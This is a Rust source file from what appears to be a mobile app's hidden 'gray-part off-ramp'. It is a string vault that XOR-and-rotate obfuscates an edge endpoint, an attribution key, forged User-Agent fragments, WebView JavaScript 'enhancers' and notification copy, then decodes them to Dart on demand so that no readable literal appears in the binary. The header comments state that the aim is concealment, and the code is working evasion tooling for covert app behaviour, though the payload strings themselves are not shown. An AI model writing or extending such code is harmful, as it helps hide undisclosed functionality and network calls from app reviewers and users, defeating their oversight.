//! Gray-part string vault.
//!
//! Holds the off-ramp strings (edge endpoint, attribution key, the
//! forged User-Agent fragments, the WebView JS enhancers and the
//! notification-screen copy) as obfuscated byte arrays and hands the
//! plaintext to Dart only on demand, one string per call, through the
//! `bw_s` export. Nothing here ships as a readable literal — not in
//! this `.so` and not in the Dart snapshot.
//!
//! The codec matches `lib/offramp/cloak/scrambler.dart` and the
//! generator `tool/burrow_gen.dart` byte-for-byte: fnv1a(salt) seeds an
//! xorshift32 keystream; each stored byte is bit-rotated right by
//! (index & 7) then XORed with keystream[i % len] to recover plaintext.
//!
//! The encoded arrays live in `vault.rs`, regenerated by
//! `dart run tool/burrow_gen.dart`. Never hand-edit them.

use core::ffi::c_char;
use std::ffi::CString;

mod vault;

// Keep in lock-step with the generator and scrambler.dart.
const SALT: [u8; 18] = [
    57, 151, 211, 209, 38, 32, 188, 3, 69, 25, 15, 102, 5, 109, 12, 27, 31, 81,
];
const STREAM_LEN: usize = 29;

fn fnv1a(data: &[u8]) -> u32 {
    let mut h: u32 = 0x811C_9DC5;
    for &c in data {
        h ^= c as u32;
        h = h.wrapping_mul(0x0100_0193);
    }
    if h == 0 { 0x9E37_79B1 } else { h }
}

fn keystream() -> [u8; STREAM_LEN] {
    let mut s = fnv1a(&SALT);
    let mut out = [0u8; STREAM_LEN];
    for byte in out.iter_mut() {
        s ^= s << 13;
        s ^= s >> 17;
        s ^= s << 5;
        *byte = (s >> 24) as u8;
    }
    out
}

#[inline]
fn rotr8(v: u8, r: u32) -> u8 {
    if r == 0 { v } else { (v >> r) | (v << (8 - r)) }
}

/// Recovers the plaintext for one stored array.
fn expose(hidden: &[u8]) -> Vec<u8> {
    if hidden.is_empty() {
        return Vec::new();
    }
    let k = keystream();
    let mut out = vec![0u8; hidden.len()];
    for i in 0..hidden.len() {
        out[i] = rotr8(hidden[i], (i & 7) as u32) ^ k[i % STREAM_LEN];
    }
    out
}

/// De-obfuscates the string for [sel] and returns a freshly allocated
/// C string. The caller MUST release it with `bw_free`. An unknown
/// selector yields an empty string, which every Dart consumer treats
/// as "not wired yet".
#[unsafe(no_mangle)]
pub extern "C" fn bw_s(sel: u32) -> *mut c_char {
    let plain = expose(vault::raw(sel));
    // NUL bytes never occur in the source strings, but guard anyway.
    let safe: Vec<u8> = plain.into_iter().filter(|&b| b != 0).collect();
    match CString::new(safe) {
        Ok(s) => s.into_raw(),
        Err(_) => CString::new("").unwrap().into_raw(),
    }
}

/// Frees a pointer returned by `bw_s`.
#[unsafe(no_mangle)]
pub extern "C" fn bw_free(ptr: *mut c_char) {
    if ptr.is_null() {
        return;
    }
    // SAFETY: the pointer came from `bw_s` via CString::into_raw and is
    // freed exactly once here.
    unsafe {
        drop(CString::from_raw(ptr));
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    fn pull(sel: u32) -> String {
        String::from_utf8(expose(vault::raw(sel))).unwrap()
    }

    #[test]
    fn known_strings_decode() {
        assert!(pull(1).starts_with("https://"));
        assert_eq!(pull(6), "Mozilla/5.0");
        assert_eq!(pull(9), ")");
        assert!(pull(19).contains("NOTIFICATIONS"));
        assert!(pull(18).contains("__ttxKb"));
    }
}
